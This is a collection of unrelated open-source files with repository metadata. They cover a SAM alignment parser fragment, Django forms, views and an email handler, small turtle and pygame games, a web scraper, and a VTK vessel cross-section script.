target += seq[:length]
seq = seq[length:]
size += length
store_operations = True
elif letter == "I":
# I: insertion to the reference
length = int(number)
query_pos += length
seq = seq[length:]
elif letter == "S":
# S: soft clipping
length = int(number)
if query_pos == 0:
coordinates[0][1] += length
query_pos += length
seq = seq[length:]
number = ""
continue
elif letter == "D": # deletion from the reference
length = int(number)
target_pos += length
size += length
starts.append(target_pos)
sizes.append(size)
size = 0
elif letter == "N": # skipped region from the reference
length = int(number)
target_pos += length
starts.append(target_pos)
sizes.append(size)
size = 0
store_operations = True
elif letter == "H":
# hard clipping (clipped sequences not present in sequence)
if query_pos == 0:
hard_clip_left = int(number)
else:
hard_clip_right = int(number)
number = ""
continue
elif letter == "P": # padding
raise NotImplementedError(
"padding operator is not yet implemented"
)
else:
number += letter
continue
coordinates.append([target_pos, query_pos])
operations.append(ord(letter))
number = ""
sizes.append(size)
seq = target
target = ""
number = ""
letters = iter(md)
for letter in letters:
if letter in "ACGTNacgtn":
if number:
number = int(number)
target += seq[:number]
seq = seq[number:]
number = ""
target += letter
seq = seq[1:]
elif letter == "^":
if number:
number = int(number)
target += seq[:number]
seq = seq[number:]
number = ""
for letter in letters:
if letter not in "ACGTNacgtn":
break
target += letter
else:
break
number = letter
else:
number += letter
if number:
number = int(number)
target += seq[:number]
seq = target
target = copy.deepcopy(self.targets[rname])
length = len(target.seq)
data = {}
index = 0
for start, size in zip(starts, sizes):
data[start] = seq[index : index + size]
index += size
target.seq = Seq(data, length=length)
if coordinates is not None:
coordinates = numpy.array(coordinates).transpose()
if strand == "-":
coordinates[1, :] = query_pos - coordinates[1, :]
if query == "*":
length = query_pos
sequence = Seq(None, length=length)
else:
sequence = Seq(query)
if not (flag & 0x4): # not unmapped
assert len(query) == query_pos
if strand == "-":
sequence = sequence.reverse_complement()
query = SeqRecord(sequence, id=qname)
if strand == "-":
hard_clip_left, hard_clip_right = hard_clip_right, hard_clip_left
if hard_clip_left is not None:
query.annotations["hard_clip_left"] = hard_clip_left
if hard_clip_right is not None:
query.annotations["hard_clip_right"] = hard_clip_right
if qual != "*":
query.letter_annotations["phred_quality"] = qual
records = [target, query]
alignment = Alignment(records, coordinates)
alignment.flag = flag
if mapq != 255:
alignment.mapq = mapq
if rnext == "=":
alignment.rnext = rname
elif rnext != "*":
alignment.rnext = rnext
if pnext >= 0:
alignment.pnext = pnext
if tlen != 0:
alignment.tlen = tlen
if score is not None:
alignment.score = score
if annotations:
alignment.annotations = annotations
if hard_clip_left is not None:
alignment.hard_clip_left = hard_clip_left
if hard_clip_right is not None:
alignment.hard_clip_right = hard_clip_right
if store_operations:
alignment.operations = operations
return alignment
|
[
"noreply@github.com"
] |
fabianegli.noreply@github.com
|
848f6eb93120d4e255b540a17c2a3762b9c4cd03
|
127525c61d9f4b4f6a69998a07d058e2e53505e2
|
/index/forms.py
|
bb09938d4585eaf5d593292b2ad3e9a8aebaf2f4
|
[] |
no_license
|
Oluwatobi17/spud
|
c742b772282188866b4d158fe950ba2389f22443
|
7d4dd81f32c1352dc6b41a9f4c88cc881a888878
|
refs/heads/master
| 2022-12-14T19:24:23.765046
| 2020-07-26T22:21:21
| 2020-07-26T22:21:21
| 293,567,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 529
|
py
|
from django import forms
from .models import User, Commodity, Cart
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput)
class Meta:
model = User
fields = ['username', 'first_name', 'last_name','email', 'password']
class CheckoutForm(forms.ModelForm):
class Meta:
model = Cart
fields = ['user','name', 'address','town', 'phoneno', 'email']
class UserUpdateForm(forms.ModelForm):
class Meta:
model = User
fields = ['first_name','last_name', 'address', 'phoneno', 'email']
|
[
"ganiuolalekan2000@yahoo.com"
] |
ganiuolalekan2000@yahoo.com
|
ba7cf89efb3b3e047499591256a9cb869bc442da
|
351f709d96fc08b2f42f2dd42efe02bff76f41a3
|
/turtleDraw.py
|
43a47232ccafb0270905bcad25214f5e0d2dae93
|
[] |
no_license
|
ChristopherGawdzikD/Turtles
|
69f9a36627eeea5e7f1d38bbce6126fbe09c91d9
|
8eeb33f2706c15ba6e4bbb869cada5bebf941616
|
refs/heads/master
| 2022-12-04T00:02:12.125401
| 2020-08-16T18:54:40
| 2020-08-16T18:54:40
| 288,003,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
from turtle import *
def getAudiLogo():
    # Draws the Audi logo: four grey rings in a row
    # Uses two for loops, one nested inside the other
for i in range(4):
for x in ["grey"]:
color(x)
pensize(5)
circle(50)
forward(60)
getAudiLogo()
done()  # keep the drawing window open
|
[
"noreply@github.com"
] |
ChristopherGawdzikD.noreply@github.com
|
f18eaaed0fbf1f40f0d8fed1c9e176c104f334bf
|
4454ed622d051f602373d7946a3936ff33cc8e97
|
/alien/enemy.py
|
1536b22abde5d8b5dd744b37d3c66d5005970225
|
[] |
no_license
|
showlocked/plane_game
|
23c056c7b85c00184c357001db21300d5eb1680e
|
b25cd1fdbce2735c903bbedb02fd85a457bcdc8f
|
refs/heads/master
| 2021-09-26T22:00:14.874451
| 2017-12-24T18:21:19
| 2017-12-24T18:21:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,560
|
py
|
from random import random
import pygame
from pygame.sprite import Sprite
__author__ = 'heshipeng'
class Enemy(Sprite):
    """ Enemy plane class. """
    def __init__(self, ali_settings, screen):
        """ Initialize the alien and set its starting position. """
        super(Enemy, self).__init__()
        self.screen = screen
        self.ali_settings = ali_settings
        # Load the alien image and set its rect attribute
        self.image = pygame.image.load('images/enemy_plane.png')
        self.rect = self.image.get_rect()
        # The movement direction depends on which side the enemy plane spawns on
        self.move_right = True
        # Each alien starts at the top of the screen, on the left or right edge
        self.rect.x = self.get_width()
        self.rect.y = self.rect.height
        # Store the enemy plane's exact position as floats
        self.x = float(self.rect.x)
        self.y = float(self.rect.y)
    def blitme(self):
        """ Draw the enemy plane at its current position. """
        self.screen.blit(self.image, self.rect)
def update(self, *args):
if self.move_right:
self.x += self.ali_settings.enemy_speed_factor
else:
self.x -= self.ali_settings.enemy_speed_factor
self.y += self.ali_settings.enemy_speed_factor
self.rect.x = self.x
self.rect.y = self.y
def get_width(self):
width_range = [0, self.screen.get_rect().right]
if random() > 0.5:
self.move_right = True
return width_range[0]
else:
self.move_right = False
return width_range[1]
|
[
"727138269@qq.com"
] |
727138269@qq.com
|
97b1215057e7a75ddc92b8f5f933bb8ee03b0733
|
23adf40a6ec7e99634053c6eb24c59fd3be4cacd
|
/Project_3.py
|
fc3c4d80837f59b8ad07c7b5648dd22578a1df1d
|
[] |
no_license
|
fyiidk/ITT109-GROUP_ASSIGNMENT
|
07164611168347d4b1029eed33aa447c7a190afb
|
286fd86532dcbaa42ee40f73ccb6a030fbfad468
|
refs/heads/master
| 2020-05-06T15:35:59.914433
| 2019-04-08T16:38:26
| 2019-04-08T16:38:26
| 180,198,546
| 0
| 0
| null | 2019-04-08T17:23:02
| 2019-04-08T17:23:02
| null |
UTF-8
|
Python
| false
| false
| 2,477
|
py
|
#! /usr/bin/python
from tkinter import *
from random import randint
# main function for determining wins, losses and draws.
def play(event):
#Images for Choices
scissor_image = PhotoImage(file="scissor.png")
rock_image = PhotoImage(file="rock.png")
paper_image = PhotoImage(file="paper.png")
output = Label(sideframe, pady=10)
output.grid(column=1, row=1)
human_choice = player_choice.get()
actions = ["Scissors","Rock","Paper"]
computer_choice = actions[randint(0,2)]
print(f"Computer: {computer_choice}")
print(f"Player: {human_choice}")
    if human_choice == computer_choice:
        result = "Draw"
    elif human_choice == "Rock" and computer_choice == "Paper":
        result = "Computer Wins"
    elif human_choice == "Paper" and computer_choice == "Scissors":
        result = "Computer Wins"
    elif human_choice == "Scissors" and computer_choice == "Rock":
        result = "Computer Wins"
    else:
        result = "Player Wins"
    output.config(text=result)
    return result
#Makes a window to place things inside of :3
window = Tk()
window.title("Rock, Paper, Scissors")
window.geometry("300x300")
#creates the frame in which the player will interact with.
mainframe = Frame(window, padx=20, pady=12)
mainframe.grid(column=0, row = 0, sticky=(N,W,E,S))
mainframe.columnconfigure(0, weight=1)
mainframe.rowconfigure(0,weight=1)
#creates frame where output will be placed. (not finished)
sideframe = Frame(window, padx=20, pady=12)
sideframe.grid(column=1, row = 0, sticky=(N,W,E,S))
sideframe.columnconfigure(0, weight=1)
sideframe.rowconfigure(0,weight=1)
#player variable.
player_choice = StringVar()
#creates buttons that player will interact with.
rock_radiobutton = Radiobutton(mainframe, pady=10, text ='Rock', variable = player_choice, value = "Rock")
rock_radiobutton.grid(column=1, row=2, sticky=W)
paper_radiobutton = Radiobutton(mainframe, pady=10 ,text ='Paper', variable = player_choice, value = "Paper")
paper_radiobutton.grid(column=1, row=3, sticky=W)
scissors_radiobutton = Radiobutton(mainframe, pady= 10,text ='Scissors', variable = player_choice, value = "Scissors")
scissors_radiobutton.grid(column=1, row=4, sticky=W)
submit_button = Button(mainframe, pady=10, text="Submit", width=3, height=1)
submit_button.bind("<Button-1>", play)
submit_button.grid(column=1, row=6, sticky=W)
#Keeps window from closing, DO NOT REMOVE.
window.mainloop()
|
[
"noreply@github.com"
] |
fyiidk.noreply@github.com
|
593300d8d86a3b96ee66b4f708950e7b2bf3ea0e
|
7e8752279e9b3c81ead83e6d5c5b57b65372db19
|
/getContent.py
|
cc9e336cd50683b8c8db0bde7ecef74bcd0744ae
|
[] |
no_license
|
kavenshi/spiders
|
4ef8a7d28775de213e9fe6f7be2d75e3a1b2aa00
|
a136a28018782661dda7ae0eed963a54a2e0cf7b
|
refs/heads/master
| 2021-09-06T10:03:49.414997
| 2018-02-04T11:34:41
| 2018-02-04T11:34:41
| 91,144,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 505
|
py
|
import re
import urllib.request
def getcontent(listurl):
    results = []
    for i in range(0, len(listurl)):
        for j in range(0, len(listurl[i])):
            try:
                url = listurl[i][j]
                url = url.replace("amp;", "")
                # open the url and read the page content
                data = urllib.request.urlopen(url).read().decode("utf-8")
                titlepat = "<title>(.*?)</title>"
                contentpat = 'id="js_content">(.*?)id="js_sg_bar"'
                title = re.compile(titlepat, re.S).findall(data)
                content = re.compile(contentpat, re.S).findall(data)
                results.append((title, content))
            except Exception as e:
                print(e)
    return results
|
[
"shilinpeng1990@aliyun.com"
] |
shilinpeng1990@aliyun.com
|
f0a267d44630536aca0d49d18c4e2b1a5ad6841f
|
2d9fd57b30cfdda54b1277729b8e50d82120197c
|
/PEPapp/PEPapp/view.py
|
fdf075d1ae834a8d568882fc59760f3b36eafc71
|
[] |
no_license
|
paulinsider/PEP
|
c7f07c8d7a058525ceec5110d4361d74fe810b1c
|
68f43a36aae05322dae7b9742429d51416e6f2af
|
refs/heads/master
| 2021-01-19T18:23:06.492274
| 2017-08-29T08:31:27
| 2017-08-29T08:31:27
| 101,129,826
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,706
|
py
|
from django.http import HttpResponse,JsonResponse
from ContainerModel.models import Container_list
from django.shortcuts import render
import os
def index(request):
return render(request, 'common/index.html')
def list(request):
response = []
list = Container_list.objects.all()
for var in list:
if var.show_type != 1:
response.append(var)
return render(request, 'common/list.html', {'data':response})
'''
def startapp(request):
id = request.GET['id']
whereparam = {'id':id}
object = Container_list.objects.get(**whereparam)
if object.status == 0:
path = "sh /home/PEP.sh " + object.path + " start"
os.system(path)
object.status = 1
object.save()
response = []
list = Container_list.objects.all()
for var in list:
response.append(var)
return render(request, 'common/list.html', {'data': response})
def stopapp(request):
id = request.GET['id']
whereparam = {'id': id}
object = Container_list.objects.get(**whereparam)
if object.status == 1:
path = "sh /home/PEP.sh " + object.path + " stop"
os.system(path)
object.status = 0
object.save()
response = []
list = Container_list.objects.all()
for var in list:
response.append(var)
return render(request, 'common/list.html', {'data': response})
'''
def manageApp(request):
action = request.POST['action']
id = int(request.POST['id'])
list = Container_list.objects.all()
response = dict()
for var in list:
if var.show_type == 1 and var.id == id:
            return HttpResponse(
                JsonResponse({"status": "failed", "comment": "This image has already been deleted!"}, content_type="application/json"))
if var.show_type == 1 :
continue
if var.status == 1 and action == 'start' and var.id != id:
return HttpResponse(JsonResponse({"status":"failed","comment":"用户一次只能申请一个练习环境。"}, content_type="application/json"))
if var.id == id:
if action == 'start' and var.status == 0:
path = "sh /home/PEP.sh " + var.path + " start"
os.system(path)
var.status = 1
var.save()
elif action == 'stop' and var.status == 1:
path = "sh /home/PEP.sh " + var.path + " stop"
os.system(path)
var.status=0
var.save()
return HttpResponse(JsonResponse({"status":"success"}, content_type="application/json"))
return HttpResponse(JsonResponse({"status":"failed","comment":"失败请重试!"}, content_type="application/json"))
|
[
"pav1,paulinsider@gmail.com"
] |
pav1,paulinsider@gmail.com
|
e1c702b160ba4a1de40e09ddb343fe3c2f08c3f7
|
8b19b224b9a26ebf586e295c61954ffb927f6e04
|
/MUPHY/MAGIC/BACKEND/SCRIPTS/TOOLS/get_xsect2.py
|
aad7b98542b39a06acd098f22067445908a72055
|
[] |
no_license
|
iacs-ac290r-2019/homework
|
5ca12a3e7fa0721e6785ca5a9069037673c3c591
|
7e052a85f97d0496c44b7aea1e5671c982cb064a
|
refs/heads/master
| 2020-04-22T22:27:57.534981
| 2019-05-08T03:52:20
| 2019-05-08T03:52:20
| 170,709,287
| 0
| 0
| null | 2019-04-09T15:37:53
| 2019-02-14T15:01:52
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 14,105
|
py
|
#!/usr/bin/env python
import os
import re
import sys
import time
import math
import getopt
def usage():
print >> sys.stderr, "Usage:",sys.argv[0],"-g stl_file -c vtk_file -s px,py,pz -e px,py,pz -n numcuts [-m]"
print >> sys.stderr, "Options:"
print >> sys.stderr, "\t-g stl_file"
print >> sys.stderr, "\t--geometry stl_file"
print >> sys.stderr, "\t\tSpecifies the STL file."
print >> sys.stderr, ""
print >> sys.stderr, "\t-c vtk_file"
print >> sys.stderr, "\t--cline vtk_file"
print >> sys.stderr, "\t\tSpecifies the VTK file containing a centerline for stl_file"
print >> sys.stderr, "\t\tspecifed with option -g."
print >> sys.stderr, ""
print >> sys.stderr, "\t-s px,py,pz"
print >> sys.stderr, "\t--startp px,py,pz"
print >> sys.stderr, "\t\tSpecifies the centerline point from which cross sections are cut"
print >> sys.stderr, ""
print >> sys.stderr, "\t-e px,py,pz"
print >> sys.stderr, "\t--endp px,py,pz"
print >> sys.stderr, "\t\tSpecifies the centerline point to which cross sections are cut"
print >> sys.stderr, ""
print >> sys.stderr, "\t-n numcuts"
print >> sys.stderr, "\t--number px,py,pz"
print >> sys.stderr, "\t\tSpecifies the number of cross sections cut between the start and"
print >> sys.stderr, "\t\tend point"
print >> sys.stderr, ""
print >> sys.stderr, "\t-m"
print >> sys.stderr, "\t--smooth"
print >> sys.stderr, "\t\tSpecifies whether the centerline in vtk_file must be smoothed"
print >> sys.stderr, "\t\tbefore cuttin the cross sections."
def dist2(n, m):
return (n[0]-m[0])**2 + (n[1]-m[1])**2 + (n[2]-m[2])**2
def get_normal(n, m):
l = math.sqrt(dist2(n,m))
if math.fabs(l-0.0) < 1.0E-10: return None
return tuple([(m[0]-n[0])/l,
(m[1]-n[1])/l,
(m[2]-n[2])/l])
def vec_prod(a,b):
return (a[1]*b[2]-a[2]*b[1], a[2]*b[0]-a[0]*b[2], a[0]*b[1]-a[1]*b[0])
def len_vect(a):
return math.sqrt(sum(n*n for n in a))
def dSur(v1, v2, v3):
v12 = (v2[0] - v1[0], v2[1] - v1[1], v2[2] - v1[2])
v13 = (v3[0] - v1[0], v3[1] - v1[1], v3[2] - v1[2])
vprod = vec_prod(v12, v13)
return len_vect(vprod)/2.0
def polygon_metrics(points, n):
center = [0.0, 0.0, 0.0]
for i in range(n):
center = map(lambda x,y:x+y, center, points.GetPoint(i))
center = map(lambda x: x/n, center)
peri = 0.0
area = 0.0
for i in range(1, n):
peri += math.sqrt(math.fabs(dist2(points.GetPoint(i-1), points.GetPoint(i))))
area += dSur(points.GetPoint(i-1), points.GetPoint(i), center)
    peri += math.sqrt(math.fabs(dist2(points.GetPoint(n-1), points.GetPoint(0))))  # closing edge
area += dSur(points.GetPoint(n-1), points.GetPoint(0), center)
return peri, area
def vect_mean(vlist):
if not vlist: return None
l = len(vlist)
tmp = (0.0, 0.0, 0.0)
for i in range(l):
tmp = map(sum, zip(tmp, vlist[i]))
return map(lambda x: x/l, tmp)
if __name__ == '__main__':
STLFNAME = ''
CLINEFNAME = ''
STAPOINT = None
ENDPOINT = None
CUTNUM = 1
SMOOTH = False
SMOOTH_WIDTH = 5
opts, args = getopt.getopt(sys.argv[1:], "g:c:s:e:n:m", ["geometry=","cline=","startp=","endp=","number=","smooth"])
if not opts:
usage()
sys.exit(1)
for o, a in opts:
if o in ("-g", "--geometry"):
STLFNAME = a
elif o in ("-c", "--cline"):
CLINEFNAME = a
elif o in ("-s", "--startp", "-e", "--endp"):
point = re.split('[ ]*,[ ]*', a.strip())
point = filter(lambda x:x, point)
try:
point = tuple(float(coo) for coo in point)
except ValueError:
print >> sys.stderr, 'Bad point specification:', a, '\n'
usage()
sys.exit(1)
if len(point) != 3:
print >> sys.stderr, 'Bad number of coordinates for point:', a, '\n'
usage()
sys.exit(1)
if o in ("-s", "--startp"):
if STAPOINT:
usage()
sys.exit(1)
STAPOINT = point
else:
if ENDPOINT:
usage()
sys.exit(1)
ENDPOINT = point
elif o in ("-n", "--number"):
CUTNUM = int(a)
elif o in ("-m", "--smooth"):
SMOOTH = True
else:
usage()
sys.exit(1)
if not STLFNAME or not CLINEFNAME:
print >> sys.stderr, 'Both geometry and centerline file must be specified.'
usage()
sys.exit(1)
if STLFNAME:
if not os.path.isfile(STLFNAME):
print >> sys.stderr, 'Cannot find file', STLFNAME
sys.exit(1)
if CLINEFNAME:
if not os.path.isfile(CLINEFNAME):
print >> sys.stderr, 'Cannot find file', CLINEFNAME
sys.exit(1)
if CUTNUM < 1:
print 'Number of cuts must be > 0!'
usage()
sys.exit(1)
# moved here to pay import latency after parameters checking
from myvtk import *
reader = vtk.vtkPolyDataReader()
reader.SetFileName(CLINEFNAME)
reader.Update()
clinePolyData = reader.GetOutput()
# we only consider the first VTK_POLY_LINE cell in the file
line = clinePolyData.GetCell(0)
if line.GetCellType() != vtk.VTK_POLY_LINE:
print 'VTK_POLY_LINE expected in file', CLINEFNAME
sys.exit(1)
points = line.GetPoints()
nump = line.GetNumberOfPoints()
if nump < 2:
print 'Too few points for center line!'
sys.exit(1)
# perform laplacian smooth, if requested
if SMOOTH:
for l in range(1,SMOOTH_WIDTH):
pbuf = []
nbuf = [points.GetPoint(i) for i in range(min(nump, l+1))]
for pid in range(nump):
tmp = vect_mean(pbuf + nbuf)
if len(pbuf) >= l: pbuf.pop(0)
pbuf += [points.GetPoint(pid)]
nbuf.pop(0)
if pid+l+1 < nump: nbuf += [points.GetPoint(pid+l+1)]
points.SetPoint(pid, tmp)
# find the points on the CLine that are the nearest to the specified start and end
startId = 0
endId = nump-1
if STAPOINT or ENDPOINT:
sDist = sys.maxint
eDist = sys.maxint
for pid in range(nump):
p = points.GetPoint(pid)
if STAPOINT:
d2 = dist2(p, STAPOINT)
if d2 < sDist:
startId = pid
sDist = d2
if ENDPOINT:
d2 = dist2(p, ENDPOINT)
if d2 < eDist:
endId = pid
eDist = d2
# the point range in the CLine is [startId,...,endId]
print 'IDs of starting and ending points:', startId, endId
incr = 1 if startId < endId else -1
pIdList = range(startId, endId+incr, incr)
length = 0.0
#for pid in pIdList[1:]:
for i in range(1, len(pIdList)):
length += math.sqrt(dist2(points.GetPoint(pIdList[i-1]),
points.GetPoint(pIdList[i ])))
print 'Length of center line section: {0: >8.3f}'.format(length)
if CUTNUM > 1:
stepLen = length / (CUTNUM-1)
else:
stepLen = 0
print 'Cuts distance: {0: >8.3f}'.format(stepLen)
# find cut planes positions
cutPlanes = []
currIdx = 0
currp = points.GetPoint(pIdList[currIdx])
nextIdx = 1
while True: # it happens that clines have first point duplicated...
n = get_normal(currp, points.GetPoint(pIdList[nextIdx]))
if n: break
nextIdx += 1
cutPlanes.append([currp, n])
for i in range(CUTNUM-1): # we always start from 0 even if there are initial duplicate points
clen = 0.0
while True:
nextIdx = currIdx+1
nextp = points.GetPoint(pIdList[nextIdx])
d = math.sqrt(dist2(currp, nextp))
if (clen + d) > stepLen: break
if nextIdx == len(pIdList)-1: break
clen += d
currIdx = nextIdx
currp = nextp
dl = stepLen-clen
ratio = dl/d
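        # linear interpolation: place the cut point the fraction `ratio` of
        # the way along the segment from currp to nextp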
#print '\tCurrent polyline length:', clen+dl
#print '\tCurrent polyline segment:', pIdList[currIdx], pIdList[nextIdx]
p = tuple([currp[0] + ratio*(nextp[0]-currp[0]),
currp[1] + ratio*(nextp[1]-currp[1]),
currp[2] + ratio*(nextp[2]-currp[2])])
cutPlanes.append([p, get_normal(currp, nextp)])
currp = p
stl = vtk.vtkSTLReader()
stl.SetFileName(STLFNAME)
pdw = vtk.vtkPolyDataWriter()
fsection = open('sections.dat','w')
for i in range(len(cutPlanes)):
p, n = cutPlanes[i]
#print 'Cross section {0}: position {1: >8.3f} {2: >8.3f} {3: >8.3f}'.format(i, p[0], p[1], p[2])
#print 'Cross section {0}: normal {1: >8.3f} {2: >8.3f} {3: >8.3f}'.format(i, n[0], n[1], n[2])
plane = vtk.vtkPlane()
plane.SetOrigin(p)
plane.SetNormal(n)
cutEdges = vtk.vtkCutter()
cutEdges.SetInputConnection(stl.GetOutputPort())
cutEdges.SetCutFunction(plane)
#cutEdges.GenerateCutScalarsOn()
#cutEdges.SetValue(0, 0.0)
cutStrips = vtk.vtkStripper()
cutStrips.SetInputConnection(cutEdges.GetOutputPort())
cutStrips.Update()
#cutPoly = vtk.vtkPolyData()
#cutPoly.SetPoints(cutStrips.GetOutput().GetPoints())
#cutPoly.SetLines(cutStrips.GetOutput().GetLines())
cutPoly = vtk.vtkPolyData()
cutPoly.SetPoints(cutStrips.GetOutput().GetPoints())
cutPoly.SetLines(cutStrips.GetOutput().GetLines())
conn = vtk.vtkPolyDataConnectivityFilter()
if vtk.VTK_MAJOR_VERSION <= 5:
conn.SetInput(cutPoly)
else:
conn.SetInputData(cutPoly)
conn.SetExtractionModeToClosestPointRegion() # extract region nearest to point
conn.SetClosestPoint(p)
conn.Update()
section = conn.GetOutput()
# compute polygons metrics
peri, area = polygon_metrics(section.GetCell(0).GetPoints(),
section.GetCell(0).GetNumberOfPoints()-1) # last is the repetition of the first!
# print 'Cross section {0}: perimeter {1: >8.3f} - area {2: >8.3f} - m.diam {3: >8.3f}'.format(i,
# peri,
# area,
# math.sqrt(area/(math.pi))*2.0)
print >> fsection, '{0} {1: >8.3f} {2: >8.3f}'.format(i, area, math.sqrt(area/(math.pi))*2.0)
        # write data with only azimuthal lines
# pdw.SetInput(section)
# pdw.SetFileName('crossSect'+str(i)+'.vtk')
# pdw.Write()
# create cells with triangular cells
merge = vtk.vtkAppendPolyData()
center = vtk.vtkPolyData()
cc = vtk.vtkPoints()
cc.InsertNextPoint(p) # insert center
center.SetPoints(cc)
if vtk.VTK_MAJOR_VERSION <= 5:
merge.AddInput(center)
merge.AddInput(section)
else:
merge.AddInputData(center)
merge.AddInputData(section)
merge.Update()
merge.GetOutput().DeleteCells()
segmCells = vtk.vtkCellArray()
line = vtk.vtkLine()
nump = section.GetNumberOfPoints()
SHOWTRIANGLES=False
for k in range(1,nump+1):
if SHOWTRIANGLES:
t = vtk.vtkTriangle()
t.GetPointIds().SetId(0,0)
t.GetPointIds().SetId(1,k)
t.GetPointIds().SetId(2,k%nump+1)
segmCells.InsertNextCell(t)
else:
line.GetPointIds().SetId(0,k)
line.GetPointIds().SetId(1,k%nump+1)
segmCells.InsertNextCell(line)
merge.GetOutput().SetLines(segmCells)
# print '# of Cells:',merge.GetOutput().GetNumberOfCells()
field = vtk.vtkFieldData()
field.SetNumberOfTuples(3)
val = vtk.vtkFloatArray()
val.SetName("area")
val.InsertNextValue(area)
field.AddArray(val)
val = vtk.vtkFloatArray()
val.SetName("mean_diameter")
val.InsertNextValue( 2.0 * math.sqrt(area/math.pi) )
field.AddArray(val)
val = vtk.vtkFloatArray()
val.SetName("perimeter")
val.InsertNextValue(peri)
field.AddArray(val)
merge.GetOutput().SetFieldData(field)
merge.Update()
if vtk.VTK_MAJOR_VERSION <= 5:
pdw.SetInput(merge.GetOutput())
else:
pdw.SetInputData(merge.GetOutput())
if i<10:
pad = '00'+str(i)
elif i<100:
pad = '0'+str(i)
elif i<1000:
pad = str(i)
else:
pad = 'XXX'+str(i)
pdw.SetFileName('crossSect'+pad+'.vtk')
pdw.Write()
## uncomment the block below to write cut normals in a vtk file
## for review
#wpoints = vtk.vtkPoints()
#for p in cutPlanes:
# wpoints.InsertNextPoint(p[0])
# # to visualize normals add a point along them
# q = [p[0][0]+p[1][0], p[0][1]+p[1][1], p[0][2]+p[1][2]]
# wpoints.InsertNextPoint(q)
#
#polydata = vtk.vtkPolyData()
#polydata.SetPoints(wpoints)
#
#segmCells = vtk.vtkCellArray()
#for i in range(len(cutPlanes)):
# line = vtk.vtkLine()
# line.GetPointIds().SetId(0,2*i)
# line.GetPointIds().SetId(1,2*i+1)
# segmCells.InsertNextCell(line)
#
#polydata.SetLines(segmCells)
#
#pdw.SetInput(polydata)
#pdw.SetFileName('cut_normals.vtk')
#pdw.Write()
|
[
"michael.s.emanuel@gmail.com"
] |
michael.s.emanuel@gmail.com
|
62aafbdb22650f40b609eb82abfdd148b18ba3a7
|
64654842414a5bbffa2456f706c14d1a5a1dbae2
|
/autoarxiv/warden/scripts/emailer.py
|
0091e500d47aefcb749603575cbd4c06a4c8253d
|
[
"MIT"
] |
permissive
|
Reslix/AutoArxiv
|
e25b1bdf94b9b01109bed7399c86da76a6df9f3a
|
96f57e687716c1b0d0786943fbc74bf2f4389da7
|
refs/heads/master
| 2021-01-20T11:41:36.617274
| 2018-01-23T00:54:34
| 2018-01-23T00:54:34
| 77,075,353
| 0
| 0
| null | 2017-02-03T05:48:27
| 2016-12-21T18:11:54
|
Python
|
UTF-8
|
Python
| false
| false
| 6,709
|
py
|
import re
import email
import imaplib
from django.core.mail import send_mail
from autoarxiv import settings
from warden.models import Author, AuthorRating, Article, ArticleRating, Member
from warden.scripts.data_connector import DataConnector
def send_listing(e_mail, listing):
"""
Formats the sorted listing into some readable plaintext form. Hasn't been tested, so this will prove to be interesting.
"""
message = "\n"
for i, msg in enumerate(listing):
message = message + msg + '\n\n'
message = message + """\n\n To update ratings for an article or author, send an email (not a reply!) to this sender address with
ARTICLE or AUTHOR in the subject line.
For articles, list line-by-line the article Arxiv ID as it came in the listing and an
integer rating between 1 and 5, separated by a comma. If the article is not currently
in the library it will be added.
For authors, do the same with the author's name and have the rating added
in the same way.
    Please make sure to use the full scale range in your ratings to help the ML aspects.
If new users want to subscribe, they should email this address with SUBSCRIBE as the subject,
and have <email>, <name> in the first line of the body.
"""
# len(listing-3) because of the extra header stuff we put in
send_mail(str(len(listing) - 3) + ' New listings, ordered by relevance',
message,
settings.EMAIL_HOST_USER,
[e_mail])
print("Sent listing to " + e_mail)
def receive_emails():
    try:
        mail = imaplib.IMAP4_SSL('imap.gmail.com')
        mail.login(settings.EMAIL_HOST_USER, settings.EMAIL_HOST_PASSWORD)
    except Exception:
        print('Unable to connect to imap')
        return
mail.select('inbox')
rawmessage = []
retcode, data = mail.search(None, '(UNSEEN)')
for num in data[0].split():
typ, data = mail.fetch(num, '(RFC822)')
msg = email.message_from_bytes(data[0][1])
#typ, data = mail.store(num, '+FLAGS', '\\Seen')
rawmessage.append(msg)
for message in rawmessage:
header = email.header.make_header(email.header.decode_header(message['Subject']))
subject = str(header)
sender = message['From'].split()[-1][1:-1]
payload = [m.get_payload() for m in message.get_payload()][0]
member = Member.objects.filter(email=sender)
print("Updating preferences for: " + message['From'])
if len(member) != 0:
member = member[0]
if subject == 'AUTHOR':
body = payload.split('\n')
for line in body:
print(line)
line = line.split(',')
if len(line) == 2:
if '@' in line[0]:
author = Author.objects.filter(email=line[0])
else:
author = Author.objects.filter(name=line[0])
arating = []
if len(author) != 0:
author = author[0]
arating = AuthorRating.objects.filter(member=member, author=author)
else:
author = Author(name=line[0])
author.save()
if len(arating) != 0:
arating = arating[0]
arating.rating = int(line[1])
else:
arating = AuthorRating(member=member, author=author, rating=int(line[1]))
arating.save()
elif subject == 'ARTICLE':
body = payload.split('\n')
for line in body:
print(line)
line = line.split(',')
if len(line) == 2:
article = Article.objects.filter(shortid=line[0])
if len(article) != 0:
arating = ArticleRating.objects.filter(member=member, article=article[0])
if len(arating) != 0:
arating = arating[0]
arating.rating = int(line[1])
else:
arating = ArticleRating(member=member, article=article[0], rating=int(line[1]))
else:
d = DataConnector()
d.fetch_links(query=line[0])
d.fetch_pdfs()
d.pdf_to_txt()
d.save(add_new=False)
article = d.articles[0]
arating = ArticleRating(member=member, article=article, rating=int(line[1]))
arating.save()
elif subject == 'SUBSCRIBE':
body = payload.split('\n')[0].split(',')
if len(Member.objects.all().filter(name=body[1], email=body[0])) == 0:
member = Member(name=body[1], email=body[0])
member.save()
send_mail('You have subscribed!', """ To update ratings for an article or author, send an email (not a reply!) to this sender address with
ARTICLE or AUTHOR in the subject line.
For articles, list line-by-line the article Arxiv ID as it came in the listing and an
integer rating between 1 and 5, separated by a comma. If the article is not currently
in the library it will be added.
For authors, do the same with the author's name and have the rating added
in the same way.
Please make sure to use the full scale range in your ratings to help the ML aspects.""",
settings.EMAIL_HOST_USER,
[sender])
mail.close()
|
[
"huashengz@gmail.com"
] |
huashengz@gmail.com
|
e87ab2c053552be6df6333daf37c54e1c4e56527
|
